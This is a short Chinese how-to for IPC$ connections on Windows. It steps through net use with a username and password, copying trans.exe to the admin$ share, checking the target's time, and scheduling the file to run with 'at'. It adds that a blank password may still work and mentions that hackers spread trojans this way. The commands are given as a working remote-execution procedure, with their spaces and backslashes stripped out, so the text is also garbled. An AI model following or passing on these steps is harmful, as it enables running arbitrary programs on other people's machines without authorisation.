怎样进行IPC连接？

确定目标地址，假如目标为：0.0.0.1，用户名为：test123，密码为：password

要传送的文件是位于D盘的trans.exe。

1、依次单击“开始”—“运行”—输入：cmd—“确定”。

2、进入cmdshell后，输入指令：netuse0.0.0.1ipc$*"password"/user:test123（回车键确定执行）

3、如果提示"命令成功完成"，则继续输入指令：copyd:trans.exe0.0.0.1admin$

4、如果提示"已经复制1个文件”，则继续输入：nettime0.0.0.1

5、假如显示"2008年1月1日下午3:15命令成功完成"，则继续输入：at0.0.0.115:16trans.exe

6、如果提示"已经增加1个任务"，就证明在2008年1月1日下午3点16分在0.0.0.1的机器上执行trans.exe。

7、如果执行完毕，关闭对0.0.0.1的IPC连接，则指令为：netuse0.0.0.1admin$/del

PS：如果第一步netuse那个命令执行不成功，则证明0.0.0.1机器的139/tcp端口和445/tcp端口没有开启。（及Windows共享）

PS2：其实netuse0.0.0.1ipc$*""/user:test123，之间的密码可以不用写，如果不写依然连接成功得到0.0.0.1的cmdshell控制

端，就证明0.0.0.1的test123用户没有密码。

PS3：cmdshell是一种shell程序，shell在计算机项目里的意思是“控制”，也就是说，一个计算机的shell，可以以

输入命令行或者指令的情况下对整个计算机进行最高权限的操作。（cmdshell的中文名可以说成为“命令提示符”）

PS4：IPC的全称为“InternetProcessConnection”，连接对方所开放的共享资源，通过共享“命名渠道”而在目标机器上

得到相应的管理权限，这个过程和连接结果称为“IPC$”，虽说IPC$已经被微软认为是一个安全漏洞，但其实也不算是

漏洞，对黑客而言，IPC$就是漏洞了，因为有些不道德的黑客可能利用IPC$散步木马程序，如果IPC$使用正确，则是管

理员对远程机器进行某种管理。